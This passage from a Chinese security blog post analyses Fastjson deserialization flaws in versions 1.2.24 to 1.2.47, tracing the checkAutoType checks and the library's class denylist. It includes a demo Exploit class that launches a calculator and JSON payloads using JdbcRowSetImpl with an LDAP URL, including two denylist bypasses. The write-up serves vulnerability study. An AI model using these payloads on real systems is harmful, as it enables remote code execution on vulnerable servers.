<figure class="highlight java"><figcaption data-lang="java"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Exploit</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>    <span class="token keyword">public</span> <span class="token class-name">Exploit</span> <span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="3"></td><td><pre>        <span class="token keyword">try</span><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="4"></td><td><pre>            <span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"calc"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="5"></td><td><pre>        <span class="token punctuation">}</span><span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> e<span class="token punctuation">)</span><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="6"></td><td><pre>            e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>        <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="8"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="9"></td><td><pre>    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span>  <span class="token function">main</span><span class="token punctuation">(</span><span class="token class-name">String</span><span class="token punctuation">[</span><span class="token punctuation">]</span> argv<span class="token punctuation">)</span><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="10"></td><td><pre>        <span class="token class-name">Exploit</span> e <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exploit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p>在相同目录下执行以下命令开启一个简易的 web 服务：</p>
<p><code>python -m SimpleHTTPServer 8081</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618104625817.webp" class="" title="image-20240618104625817"></p>
<p>最后通过 postman 将 payload 打过去即可加载远程类，执行类中代码</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618104942541.webp" class="" title="image-20240618104942541"></p>
<h3 id="fastjson-1225"><a class="anchor" href="#fastjson-1225">#</a> Fastjson-1.2.25</h3>
<p>在版本 1.2.25 中，官方对之前的反序列化漏洞进行了修复，引入了 checkAutoType 安全机制，默认情况下 autoTypeSupport 关闭，不能直接反序列化任意类，而打开 AutoType 之后，是基于内置黑名单来实现安全的，fastjson 也提供了添加黑名单的接口。</p>
<blockquote>
<p>影响版本： <code>1.2.25 &lt;= fastjson &lt;= 1.2.41</code>  描述：作者通过为危险功能添加开关，并提供黑白名单两种方式进行安全防护，其实已经是相当完整的防护思路，而且作者已经意识到黑名单类将会无穷无尽，仅仅通过维护列表来防止反序列化漏洞并非最好的办法。而且靠用户自己来关注安全信息去维护也不现实。</p>
</blockquote>
<p>该版本的安全更新主要集中在 <code>com.alibaba.fastjson.parser.ParserConfig.java</code>  文件中，使用 idea 反编译查看对应的.class 文件，新出现了几个成员变量：布尔类型的 <code>autoTypeSupport</code> ，用来指定是否开启任意类的反序列化，默认关闭；字符串数组 <code>denyList</code> ，存放着黑名单类；字符串数组 <code>acceptList</code> ，存放白名单类</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618203400528.webp" class="" title="image-20240618203400528"></p>
<p>黑名单 <code>denylist</code>  包含：</p>
<pre><code>bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework
</code></pre>
<p>添加白名单有三种方法：</p>
<p>1、使用代码： <code>ParserConfig.getGlobalInstance().addAccept(“org.javaweb.”)</code></p>
<p>2、加上 JVM 启动参数： <code>-Dfastjson.parser.autoTypeAccept=org.javaweb.</code></p>
<p>3、在 fastjson.properties 中添加： <code>fastjson.parser.autoTypeAccept=org.javaweb.</code></p>
<h4 id="漏洞分析-2"><a class="anchor" href="#漏洞分析-2">#</a> 漏洞分析</h4>
<p>往下定位到 <code>checkAutoType()</code>  方法处，如果开启了 <code>autoTypeSupport</code> ，则先匹配白名单，若匹配到就直接使用 <code>TypeUtils.loadClass()</code>  进行加载，然后在进行黑名单匹配，匹配到就直接抛出异常</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618204838396.webp" class="" title="image-20240618204838396"></p>
<p>如果没开启 <code>autoTypeSupport</code> ，就先使用黑名单匹配，匹配到了抛出异常。然后再用白名单匹配加载</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618211854792.webp" class="" title="image-20240618211854792"></p>
<p>若是黑白名单都没有匹配到的话，只有开启 <code>autoTypeSupport</code>  且指定了 Class 对象才会加载</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618212416787.webp" class="" title="image-20240618212416787"></p>
<p>继续跟进 <code>loadClass()</code>  方法，这其中会对类名进行一些预处理，通过递归去除开头的 <code>[</code> 、 <code>L</code>  以及结尾的 <code>;</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618213114272.webp" class="" title="image-20240618213114272"></p>
<p>然而因为这样的处理就会导致逻辑漏洞，攻击者可恶意构造包含这些字符的类从而能够绕过前面黑名单的过滤，在具体加载前，这些特殊符号又会被去掉，从而又能导致任意类加载。</p>
<p>所以最终的 payload 之一可以如下：</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>	<span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"Lcom.sun.rowset.JdbcRowSetImpl;"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="3"></td><td><pre>	<span class="token property">"dataSourceName"</span><span class="token operator">:</span><span class="token string">"ldap://localhost:1389/Exploit"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="4"></td><td><pre>	<span class="token property">"autoCommit"</span><span class="token operator">:</span><span class="token boolean">true</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p>不过该版本默认关闭了 <code>autoTypeSupport</code> ，所以在反序列化之前需要先开启:</p>
<p><code>ParserConfig.getGlobalInstance().setAutoTypeSupport(true)</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618214258659.webp" class="" title="image-20240618214258659"></p>
<p>然后将 payload 打过去即可触发恶意类的代码</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618222803771.webp" class="" title="image-20240618222803771"></p>
<h3 id="fastjson-1247"><a class="anchor" href="#fastjson-1247">#</a> Fastjson-1.2.47</h3>
<p>在 fastjson 不断迭代到 1.2.47 时，爆出了最为严重的漏洞，可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。</p>
<blockquote>
<p>影响版本： <code>1.2.25 &lt;= fastjson &lt;= 1.2.32 未开启 AutoTypeSupport</code>  影响版本： <code>1.2.33 &lt;= fastjson &lt;= 1.2.47</code>  描述：作者删除了一个 fastjson 的测试文件： <code>https://github.com/alibaba/fastjson/commit/be41b36a8d748067ba4debf12bf236388e500c66</code>  ，里面包含了这次通杀漏洞的 payload。</p>
</blockquote>
<p>该漏洞的点位于 <code>checkAutoType()</code>  中</p>
<p>首先还是先判断是否开启 <code>autoTypeSupport</code> ，若开启，则先匹配白名单，若没匹配到再匹配黑名单，此时只有黑名匹配到且同时没有从 <code>mappings</code>  中取到对应的 class 才会抛出异常</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619152628310.webp" class="" title="image-20240619152628310"></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619152641886.webp" class="" title="image-20240619152641886"></p>
<p>若是从 <code>mappings</code>  中取到了 class 或者从 <code>deserializers</code>  中取到 class，则会返回</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619152916848.webp" class="" title="image-20240619152916848"></p>
<p>然后再往下就是没有开启 <code>autoTypeSupport</code>  时的处理，此时就直接匹配黑名单，匹配到直接抛出异常</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619153003713.webp" class="" title="image-20240619153003713"></p>
<p>所以在这里出现了可以利用的点：先将要反序列化的类先加入到 <code>mappings</code>  中，然后再调用到 <code>checkAutoType()</code>  方法即可绕过黑白名单</p>
<p>所以寻找能够往 <code>mappings</code>  中赋值的方法，首先发现了 <code>addBaseClassMappings()</code>  方法，然而该方法无参数传入，无法利用；然后找到了 <code>loadClass()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619153925994.webp" class="" title="image-20240619153925994"></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619154133753.webp" class="" title="image-20240619154133753"></p>
<p>该方法可以尝试利用，只要参数可控即可利用成功，寻找一下调用该方法的地方</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619172759472.webp" class="" title="image-20240619172759472"></p>
<p>在 <code>com.alibaba.fastjson.serializer.MiscCodec.java</code>  文件中的 <code>deserialze()</code>  中发现了调用，调用的条件为传入的 <code>clazz</code>  为 <code>Class.class</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619173242478.webp" class="" title="image-20240619173242478"></p>
<p>该类实现了序列化与反序列化的接口，因此可以通过该类的实例来进行反序列化的操作</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619204544677.webp" class="" title="image-20240619204544677"></p>
<p>此时可以进行简单调试下看看流程，发现在初始化反序列化器的时候也将 <code>MiscCodec</code>  的实例添加了进去，测试数据为：</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>    <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"java.lang.Class"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="3"></td><td><pre>    <span class="token property">"val"</span><span class="token operator">:</span><span class="token string">"666"</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619212224359.webp" class="" title="image-20240619212224359"></p>
<p>继续调试发现在获取反序列化器时获取的正是 <code>MiscCodec</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619214008137.webp" class="" title="image-20240619214008137"></p>
<p>继续向下调试，设置解析状态为 <code>TypeNameRedirect</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619220403694.webp" class="" title="image-20240619220403694"></p>
<p>接下来就使用 <code>MiscCodec</code>  的反序列化器来执行反序列化操作了</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619220525207.webp" class="" title="image-20240619220525207"></p>
<p>继续跟进 <code>deserialize()</code>  方法里面，该部分实现的功能就是解析 JSON 中的 <code>"val"</code>  字段，并将对应的值赋值给 <code>objVal</code>  变量</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619220857162.webp" class="" title="image-20240619220857162"></p>
<p>接着将 <code>objVal</code>  的值传给了 <code>strVal</code></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619221007895.webp" class="" title="image-20240619221007895"></p>
<p>然后便执行到了预期的 <code>loadClass()</code>  处</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619221158026.webp" class="" title="image-20240619221158026"></p>
<p>继续往里跟进，最后运行到此处，当 <code>className</code>  存在时则会返回对应的 Class 对象，然后就把类名与 Class 对象添加进 <code>mappings</code>  里面</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619221550165.webp" class="" title="image-20240619221550165"></p>
<p>到此利用链就清晰了，现在可以构造黑名单中的类作为 <code>strVal</code>  的值，然后就会被加载进 <code>mappings</code>  中，接着再通过 <code>@type</code>  请求即可成功绕过黑名单，所以最终的 payload 为：</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>    <span class="token property">"h40vv3n"</span><span class="token operator">:</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="3"></td><td><pre>        <span class="token property">"@type"</span><span class="token operator">:</span> <span class="token string">"java.lang.Class"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="4"></td><td><pre>        <span class="token property">"val"</span><span class="token operator">:</span> <span class="token string">"com.sun.rowset.JdbcRowSetImpl"</span></pre></td></tr><tr><td data-num="5"></td><td><pre>    <span class="token punctuation">}</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="6"></td><td><pre>    <span class="token property">"h40vv3n1"</span><span class="token operator">:</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="7"></td><td><pre>        <span class="token property">"@type"</span><span class="token operator">:</span> <span class="token string">"com.sun.rowset.JdbcRowSetImpl"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="8"></td><td><pre>        <span class="token property">"dataSourceName"</span><span class="token operator">:</span> <span class="token string">"ldap://localhost:1389/Exploit"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="9"></td><td><pre>        <span class="token property">"autoCommit"</span><span class="token operator">:</span> <span class="token boolean">true</span></pre></td></tr><tr><td data-num="10"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p>使用 postman 打过去成功触发恶意代码</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240619222828702.webp" class="" title="image-20240619222828702"></p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2024-06-26 11:44:15" itemprop="dateModified" datetime="2024-06-26T11:44:15+08:00">2024-06-26</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝杯咖啡吧☕️</p><div id="qr"><div><img loading="lazy" data-src="/assets/wechatpay.webp" alt="h40vv3n 微信支付"><p>微信支付</p></div><div><img loading="lazy" data-src="/assets/alipay.webp" alt="h40vv3n 支付宝"><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>h40vv3n<i class="ic i-at"><em>@</em></i>保持谦逊</li><li class="link"><strong>本文链接：</strong><a href="http://example.com/2024/06/26/Fastjson-Deserialize/" title="Fastjson-Deserialize">http://example.com/2024/06/26/Fastjson-Deserialize/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2024/06/24/hello-world/" rel="prev" itemprop="url" data-background-image="https://i.imgtg.com/2023/03/09/Y0zdB.jpg" title="Hello World"><span class="type">上一篇</span><h3>Hello World</h3></a></div><div class="item right"><a href="/2024/07/01/URLDNS-Deserialize/" rel="next" itemprop="url" data-background-image="https://i.imgtg.com/2023/03/09/YS6XY.jpg" title="URLDNS-Deserialize"><span class="type">下一篇</span><h3>URLDNS-Deserialize</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson-1224"><span class="toc-number">1.</span> <span class="toc-text"> Fastjson-1.2.24</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#templatesimpl%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.1.</span> <span class="toc-text"> TemplatesImpl 反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.1.1.</span> <span class="toc-text"> 漏洞分析</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%81%B6%E6%84%8F%E7%B1%BB%E5%AD%97%E8%8A%82%E7%A0%81%E6%9E%84%E9%80%A0"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 恶意类字节码构造</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#jdbcrowsetimpl%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.2.</span> <span class="toc-text"> JdbcRowSetImpl 反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8marshalsec%E6%9E%84%E5%BB%BAldap%E6%9C%8D%E5%8A%A1"><span class="toc-number">1.2.1.</span> <span class="toc-text"> 使用 marshalsec 构建 ldap 服务</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson-1225"><span class="toc-number">2.</span> <span class="toc-text"> Fastjson-1.2.25</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2"><span class="toc-number">2.1.</span> <span class="toc-text"> 漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson-1247"><span class="toc-number">3.</span> <span class="toc-text"> Fastjson-1.2.47</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="h40vv3n" src="/assets/avatar.webp"><p class="name" itemprop="name">h40vv3n</p><div class="description" itemprop="description">这个人很懒，什么都不愿说</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">3</span><span class="name">文章</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://gitee.com/h40vv3n" class="item github" title="https://gitee.com/h40vv3n"><i class="ic i-github"></i></a><a href="mailto:h40vv3n@qq.com" class="item email" title="mailto:h40vv3n@qq.com"><i class="ic i-envelope"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="/page/" rel="section"><i class="ic i-user"></i>submenu</a><ul class="submenu"><li class="item"><a href="/page1/" rel="section"><i class="ic i-cloud"></i>link</a></li></ul></li><li class="item"><a href="/page2/" rel="section"><i class="ic i-coffee"></i>link2</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2024/07/01/URLDNS-Deserialize/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2024/06/24/hello-world/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2024/07/01/URLDNS-Deserialize/">URLDNS-Deserialize</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2024/06/24/hello-world/">Hello World</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2024/06/26/Fastjson-Deserialize/">Fastjson-Deserialize</a></span></li></ul></div></div><div class="status"><div class="copyright">© 2022 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">h40vv3n @ Y1 h40vv3n</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">19k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">17 分钟</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> &amp; Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config="" type="text/javascript">var LOCAL = {
    ispost: true,
        path: `2024/06/26/Fastjson-Deserialize/`,
        favicon: {
        show: `c(˘▽˘c)`,
        hide: `c(˘△˘c)`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.2.4/pace.min.js" async=""></script><script src="/js/siteInit.js?v=0.4.4" type="module" fetchpriority="high" defer=""></script></body></html>